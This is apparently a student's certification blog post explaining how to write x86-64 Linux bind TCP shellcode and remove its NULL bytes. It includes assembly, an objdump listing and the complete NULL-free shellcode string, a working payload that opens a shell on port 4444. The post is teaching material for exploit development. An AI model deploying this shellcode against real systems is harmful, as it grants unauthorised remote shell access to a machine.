SLAE64 - Bind TCP shellcode

The first assignment of the SLAE64 exam states:

Create a Shell_Bind_TCP shellcode:
- Binds to a port
- Needs a “passcode”
- If passcode is correct then execute a shell
Remove 0x00 from the Bind TCP shellcode discussed in the course

Shell Bind TCP shellcode

The first assignment is to create a bind TCP shellcode that requires a passcode before it spawns a shell. What should happen when a wrong passcode is entered isn’t defined, so I’ll just exit with a non-zero return code.

It follows this basic pattern to spawn a shell:

- Allocate a file descriptor through socket(2)
- Set up the structure defining the address family, address and port to listen on
- Bind the socket with the above parameters
- Listen on the socket for incoming connections
- Upon accepting a connection, duplicate the file descriptors for input/output onto it
- Print a password prompt and require the correct password to be entered
- If the password was correct a shell is spawned; otherwise it exits
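As a rough illustration of the flow above, here is a minimal Python sketch rather than the actual assembly. The names make_listener, passcode_gate and serve_once, the prompt text with its trailing space and the loopback bind address are all assumptions made for this example. The shellcode itself listens on port 4444 on all addresses and goes on to spawn the shell, which the sketch deliberately leaves out.

```python
import socket

PROMPT = b"enter password: "  # assumed prompt text, trailing space included


def make_listener(port: int) -> socket.socket:
    """socket(2), bind(2) and listen(2) in one go."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Loopback only for this sketch; the shellcode binds to all addresses.
    sock.bind(("127.0.0.1", port))
    sock.listen(2)
    return sock


def passcode_gate(conn: socket.socket, passcode: bytes) -> bool:
    """Send the prompt, read one reply and compare it with the passcode."""
    conn.sendall(PROMPT)
    reply = conn.recv(64)
    return reply.rstrip(b"\r\n") == passcode


def serve_once(port: int, passcode: bytes) -> int:
    """Accept a single client and return an exit status (0 = passcode ok)."""
    with make_listener(port) as listener:
        conn, _addr = listener.accept()
        with conn:
            # The shellcode duplicates the connection onto its standard file
            # descriptors before prompting and spawns a shell once the gate
            # passes; this sketch only reports the outcome.
            return 0 if passcode_gate(conn, passcode) else 1
```

Calling serve_once(4444, b"hunter2") blocks until one client connects; the passcode here is of course just a placeholder.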

If this were regular assembly rather than shellcode, where size is a constraint, it would be a good habit to check the return value of each syscall. Most of them return a negative value upon failure, so we can compare the result against 0 (held in R13 in the example below) and jump to the out label, which calls exit with a non-zero return code to indicate failure. For example:

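    [...]
    syscall
    xor r13, r13    ; r13 = 0
    cmp rax, r13    ; compare the syscall's return value with 0
    jl out          ; signed "less than": bail out on a negative value

out:
    mov rax, 60     ; exit(2)
    mov rdi, 1      ; exit status 1
    syscall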

However, this adds a fair amount of code (8 bytes) for every syscall. So for the sake of this exercise I ignore errors and simply hope none of the syscalls fail.
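To make the "negative value upon failure" convention concrete: on Linux a raw syscall reports failure by returning the negated errno in RAX, and only values from -4095 to -1 count as errors. The following Python sketch decodes such a value; decode_syscall_return is a made-up helper name, not something from the course material.

```python
import errno

MASK64 = (1 << 64) - 1


def decode_syscall_return(rax: int):
    """Return the errno name if the raw RAX value signals failure, else None."""
    rax &= MASK64
    # Reinterpret the 64-bit register content as a signed integer.
    signed = rax - (1 << 64) if rax >> 63 else rax
    if -4095 <= signed < 0:
        return errno.errorcode.get(-signed, f"errno {-signed}")
    return None
```

A bind(2) that fails because the port is already taken would, for instance, leave the 64-bit encoding of -EADDRINUSE in RAX, which this helper maps back to the name "EADDRINUSE".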

The passcode handling relies on a simple cmp instruction and whether it sets the zero flag. cmp subtracts its operands without storing the result; if they are equal the result is zero and ZF is set, which means the data we read is equal to the string we stored previously in RBX.
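The comparison can be modelled in a few lines of Python. This is only a sketch of the idea, assuming the passcode fits in a single 64-bit register; the helper names and the passcode "passw0rd" are invented for the example.

```python
MASK64 = (1 << 64) - 1


def load_qword(data: bytes) -> int:
    """Load up to 8 bytes as a little-endian 64-bit value, like a register load."""
    return int.from_bytes(data[:8].ljust(8, b"\x00"), "little")


def cmp_sets_zf(left: int, right: int) -> bool:
    """Model cmp: subtract, discard the result, report whether ZF would be set."""
    return ((left - right) & MASK64) == 0


def passcode_matches(received: bytes, expected: bytes) -> bool:
    """True when the first 8 bytes of both inputs are identical."""
    return cmp_sets_zf(load_qword(received), load_qword(expected))
```

Note that in this model only the first 8 bytes take part in the comparison, so passcode_matches(b"passw0rd-extra", b"passw0rd") is also true.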

For me the difficulty in this assignment was laying out the required structs on the stack correctly without introducing any NULL bytes. The prime example of this is setting up struct sockaddr for the bind(2) syscall. First off, we need to construct the struct (pun intended) in reverse order, since the stack grows towards lower addresses. So start by pushing 8 bytes of 0 for sin_zero:

    xor rax, rax
    push rax

Now here comes the key step: push another 8 bytes of zero. This leaves all 16 bytes of the struct zeroed out, so the remaining fields can be written in place with narrow stores that carry no NULL bytes themselves:

    push rax                    ; Another 8 bytes worth of zero.
                                ; Half of it is for sin_addr.s_addr.
    mov word [rsp+2], 0x5c11    ; Write sin_port: 4444 in network byte order
    mov byte [rsp], 0x2         ; Write sin_family: AF_INET = 2
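To double-check the layout, the pushes and stores can be replayed on a 16-byte buffer in Python and compared against a struct sockaddr_in built field by field. This is a verification sketch only; the function names are invented for the example.

```python
import struct

AF_INET = 2
PORT = 4444


def sockaddr_via_stack_writes() -> bytes:
    """Replay the two pushes and two stores on a 16-byte buffer."""
    frame = bytearray(16)                        # two pushes of a zeroed rax
    frame[2:4] = (0x5C11).to_bytes(2, "little")  # mov word [rsp+2], 0x5c11
    frame[0] = 0x02                              # mov byte [rsp], 0x2
    return bytes(frame)


def sockaddr_reference() -> bytes:
    """struct sockaddr_in for 0.0.0.0:4444, built field by field."""
    return (
        struct.pack("<H", AF_INET)  # sin_family, little-endian host order
        + struct.pack(">H", PORT)   # sin_port, network (big-endian) order
        + bytes(4)                  # sin_addr.s_addr = INADDR_ANY
        + bytes(8)                  # sin_zero padding
    )
```

Both functions produce the bytes 02 00 11 5c followed by twelve zero bytes, which also shows why the immediate is 0x5c11: stored little-endian it ends up in memory as 11 5c, i.e. 0x115c = 4444 in network byte order.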

In the end I decided to add an “enter password:” prompt as well. Since that string exceeds 8 bytes, it had to be pushed onto the stack using two mov/push operations.
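Working out the immediates for such mov/push pairs by hand is error-prone, so a small Python helper can do it. This is a sketch under assumptions: qwords_to_push is a made-up name, and the prompt is assumed to be exactly 16 bytes (with a trailing space) so that no padding, and therefore no NULL byte, is needed.

```python
def qwords_to_push(text: bytes) -> list:
    """Split text into 8-byte chunks and return them as hex immediates
    in the order they have to be pushed (last chunk first)."""
    if len(text) % 8 != 0:
        raise ValueError("length must be a multiple of 8 to avoid NULL padding")
    chunks = [text[i:i + 8] for i in range(0, len(text), 8)]
    # Each chunk is loaded into a register as a little-endian 64-bit value.
    return [f"0x{int.from_bytes(chunk, 'little'):016x}" for chunk in reversed(chunks)]
```

For b"/bin//sh" this yields 0x68732f2f6e69622f, the same constant that shows up in the objdump listing of the execve part.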

The total size of this shellcode is 251 bytes.

Removing 0x00 from the discussed shellcode

The original shellcode contains a fair number of NULLs according to objdump:

$ objdump -D -M intel BindShell.o

BindShell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:   b8 29 00 00 00          mov    eax,0x29
   5:   bf 02 00 00 00          mov    edi,0x2
   a:   be 01 00 00 00          mov    esi,0x1
   f:   ba 00 00 00 00          mov    edx,0x0
  14:   0f 05                   syscall
  16:   48 89 c7                mov    rdi,rax
  19:   48 31 c0                xor    rax,rax
  1c:   50                      push   rax
  1d:   89 44 24 fc             mov    DWORD PTR [rsp-0x4],eax
  21:   66 c7 44 24 fa 11 5c    mov    WORD PTR [rsp-0x6],0x5c11
  28:   66 c7 44 24 f8 02 00    mov    WORD PTR [rsp-0x8],0x2
  2f:   48 83 ec 08             sub    rsp,0x8
  33:   b8 31 00 00 00          mov    eax,0x31
  38:   48 89 e6                mov    rsi,rsp
  3b:   ba 10 00 00 00          mov    edx,0x10
  40:   0f 05                   syscall
  42:   b8 32 00 00 00          mov    eax,0x32
  47:   be 02 00 00 00          mov    esi,0x2
  4c:   0f 05                   syscall
  4e:   b8 2b 00 00 00          mov    eax,0x2b
  53:   48 83 ec 10             sub    rsp,0x10
  57:   48 89 e6                mov    rsi,rsp
  5a:   c6 44 24 ff 10          mov    BYTE PTR [rsp-0x1],0x10
  5f:   48 83 ec 01             sub    rsp,0x1
  63:   48 89 e2                mov    rdx,rsp
  66:   0f 05                   syscall
  68:   49 89 c1                mov    r9,rax
  6b:   b8 03 00 00 00          mov    eax,0x3
  70:   0f 05                   syscall
  72:   4c 89 cf                mov    rdi,r9
  75:   b8 21 00 00 00          mov    eax,0x21
  7a:   be 00 00 00 00          mov    esi,0x0
  7f:   0f 05                   syscall
  81:   b8 21 00 00 00          mov    eax,0x21
  86:   be 01 00 00 00          mov    esi,0x1
  8b:   0f 05                   syscall
  8d:   b8 21 00 00 00          mov    eax,0x21
  92:   be 02 00 00 00          mov    esi,0x2
  97:   0f 05                   syscall
  99:   48 31 c0                xor    rax,rax
  9c:   50                      push   rax
  9d:   48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
  a4:   2f 73 68
  a7:   53                      push   rbx
  a8:   48 89 e7                mov    rdi,rsp
  ab:   50                      push   rax
  ac:   48 89 e2                mov    rdx,rsp
  af:   57                      push   rdi
  b0:   48 89 e6                mov    rsi,rsp
  b3:   48 83 c0 3b             add    rax,0x3b
  b7:   0f 05                   syscall

There are a few common patterns we can use to get rid of the NULLs. For example:

mov eax, 41

can also be expressed as:

xor rax, rax ; clear the rax register (effectively zeroing it)
add rax, 41  ; add 41 to 0

Instead of using the add instruction after clearing the register, we could simply increment the register with inc if we need something small like 1 or 2.

Another method is to subtract the register from itself:

sub rax, rax
add rax, 41

If we also optimize for size we can take it one step further by using al, which is the lowest 8 bits of the 64-bit rax register:

04 29                   add    al,0x29

compared to:

48 83 c0 29             add    rax,0x29

Additionally, pushing a value onto the stack and then popping it into the destination register is another way to get rid of NULLs, and it often decreases code size too.
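To compare these variants side by side, the following Python sketch tabulates the size of each encoding and whether it contains a NULL byte. The byte sequences for the mov, xor, sub and add forms are taken from the listings in this post; the push/pop encoding (6a 29 58) is my own addition for illustration and does not appear in the listings.

```python
ENCODINGS = {
    "mov eax, 41": bytes.fromhex("b829000000"),
    "xor rax, rax / add rax, 41": bytes.fromhex("4831c0" "4883c029"),
    "sub rax, rax / add rax, 41": bytes.fromhex("4829c0" "4883c029"),
    "xor rax, rax / add al, 41": bytes.fromhex("4831c0" "0429"),
    "push 41 / pop rax": bytes.fromhex("6a29" "58"),  # not from the listings
}


def summarize(encodings: dict) -> dict:
    """Map each variant to (size in bytes, contains a NULL byte)."""
    return {name: (len(code), 0 in code) for name, code in encodings.items()}


if __name__ == "__main__":
    for name, (size, has_null) in summarize(ENCODINGS).items():
        print(f"{name:30} {size} bytes  NULL: {has_null}")
```

Only the plain mov contains NULL bytes; the NULL-free variants range from 3 to 7 bytes.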

The end result for my clean BindShell_no_null.nasm is:

\x48\x31\xc0\x40\xb7\x02\x40\x88\xc6\x40\xfe\xc6\x88\xc2\x48\x83\xc0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x40\x88\xc6\xb0\x32\x40\x80\xc6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\xc6\x44\x24\xff\x10\x48\x83\xec\x01\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x29\xc0\xfe\xc0\xfe\xc0\xfe\xc0\x0f\x05\x4c\x89\xcf\x48\x31\xc9\x88\xc8\x04\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x40\x88\xc6\x04\x21\x40\xfe\xc6\x40\xfe\xc6\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05

It is slightly larger than the original, but I used a variety of ways to zero out and increment registers and did not always pick the method that generates the least code.
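A quick way to confirm that a shellcode string like the one above really is free of NULL bytes is to parse the \x escapes and scan the result. The helpers below are a sketch with invented names, not part of the repository.

```python
import re


def parse_escaped(text: str) -> bytes:
    r"""Turn a string such as '\x48\x31\xc0' into raw bytes."""
    pairs = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(pair, 16) for pair in pairs)


def null_offsets(code: bytes) -> list:
    """Return the offsets of all 0x00 bytes in code."""
    return [offset for offset, byte in enumerate(code) if byte == 0]


if __name__ == "__main__":
    # Only the first six bytes of the shellcode, to keep the example short.
    head = parse_escaped(r"\x48\x31\xc0\x40\xb7\x02")
    print(len(head), null_offsets(head))
```

Feeding the complete string to parse_escaped gives both the total size (via len) and, through null_offsets, the position of any NULL byte that slipped through.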

Wrapping up

I have uploaded my code to jasperla/slae64 on GitHub.

I have also uploaded a helper script I wrote to the repository which helped me in testing and validating the code throughout the course: compile.py (requires Python 3.6).

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. Student ID: SLAE64-1614